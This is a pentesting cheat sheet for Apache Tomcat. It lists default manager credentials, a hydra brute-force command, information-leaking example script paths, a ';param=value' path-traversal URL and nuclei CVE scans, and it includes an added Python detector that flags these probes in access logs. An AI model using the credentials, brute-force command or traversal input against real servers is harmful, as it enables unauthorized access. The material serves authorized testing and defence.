Apache-Tomcat-Pentesting
Apache Tomcat exploit and pentesting guide for penetration testers
Apache Tomcat
Default credentials
The most interesting path on a Tomcat server is /manager/html: from there you can upload and deploy WAR files (that is, execute code). The path is protected by HTTP basic authentication; the most common credentials are:
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
Bruteforce
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
Vulnerabilities
Example Scripts Information Leakage
The following example scripts ship with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross-site scripting (XSS) injection.
/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp
Path Traversal (..;/)
http://www.vulnerable.com/;param=value/manager/html
Apache Tomcat Snoop Servlet Remote Information Disclosure
https://target:ip/examples/jsp/snp/snoop.jsp
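The following added example (not part of the original guide) shows the detection side of the sections above: it scans access-log lines for repeated 401 responses on the manager, requests to the bundled example applications, and path parameters (;) in a URI that resolves to the manager. It assumes common log format; the sample lines, the threshold of 5 and the function names are constructed for illustration.

```python
import re
from collections import Counter

# Common log format: host ident user [time] "METHOD URI PROTO" status bytes
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')
EXAMPLE_PREFIXES = ("/examples/", "/tomcat-docs/")

def effective_path(uri):
    """Approximate the path Tomcat maps: drop ;params per segment, resolve '..'."""
    out = []
    for seg in uri.split("?", 1)[0].split("/"):
        seg = seg.split(";", 1)[0]
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)

def analyze(lines, threshold=5):  # threshold is an assumed value, tune it
    findings, failures = [], Counter()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, uri, status = m.group(1), m.group(2), int(m.group(3))
        path = effective_path(uri)
        if path.startswith(EXAMPLE_PREFIXES):
            findings.append(("example-app", client, uri))
        if (path + "/").startswith("/manager/"):
            if ";" in uri.split("?", 1)[0]:
                findings.append(("path-parameter", client, uri))
            if status == 401:
                failures[client] += 1
    for client, n in failures.items():
        if n >= threshold:
            findings.append(("manager-auth-failures", client, n))
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic)
TS = "[10/Oct/2023:13:55:36 +0000]"
SAMPLE = [f'203.0.113.5 - - {TS} "GET /manager/html HTTP/1.1" 401 2473'] * 5 + [
    f'198.51.100.7 - - {TS} "GET /examples/jsp/snp/snoop.jsp HTTP/1.1" 200 1024',
    f'198.51.100.7 - - {TS} "GET /;param=value/manager/html HTTP/1.1" 401 2473',
    f'192.0.2.10 - - {TS} "GET /app/index.jsp HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE):
        print(finding)
```

Matching on the normalized path rather than the raw URI is what lets the same rule catch both the plain /manager/html request and the ;param=value variant.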
Apache Tomcat - Cross-Site Scripting
nuclei -u target -t CVE-2019-0221.yaml
Apache Tomcat Remote Command Execution
nuclei -u target -t CVE-2020-9484.yaml
Tomcat scanning tools
sudo python3 -m pip install apachetomcatscanner
apachetomcatscanner -tt target_ip -tp port --no-check-certificate